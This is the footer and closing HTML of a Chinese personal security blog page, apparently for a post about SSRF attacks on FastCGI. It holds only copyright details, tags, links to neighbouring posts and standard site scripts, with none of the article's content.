</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:1916003479@qq.com">uf9n1x</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://uf9n1x.top/2023/04/16/ssrf-zhi-gong-ji-fastcgi/">https://uf9n1x.top/2023/04/16/ssrf-zhi-gong-ji-fastcgi/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://uf9n1x.top">Uf9n1x's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/websec/">websec</a><a class="post-meta__tags" href="/tags/SSRF/">SSRF</a><a class="post-meta__tags" href="/tags/fastcgi/">fastcgi</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/04/16/php-fan-xu-lie-hua/"><i class="fa fa-chevron-left">  </i><span>php反序列化</span></a></div><div class="next-post pull-right"><a href="/2023/04/16/ssrf-zhi-gong-ji-redis/"><span>SSRF之攻击Redis</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div class="layout" id="footer"><div class="copyright">&copy;2023 By uf9n1x</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>